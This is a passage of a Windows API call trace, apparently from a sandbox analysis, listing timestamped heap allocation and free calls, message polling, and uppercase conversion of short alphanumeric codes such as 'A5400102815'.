out: lpMsg=0x8bf3c0) returned 0 [0251.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0251.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0251.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0251.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0251.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0251.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0251.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.671] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0251.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.672] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0251.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0251.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.673] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.673] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.673] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0251.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.673] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.674] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0251.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.674] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0251.674] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.674] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.674] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.674] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.675] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0251.675] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0251.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.676] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0251.676] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.676] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0251.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.676] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.677] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0251.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.677] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0251.677] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.678] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.678] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.678] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.679] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0251.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.679] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0251.679] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.679] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.679] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.679] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0251.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.680] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0251.680] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0251.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f4348 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.683] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.683] 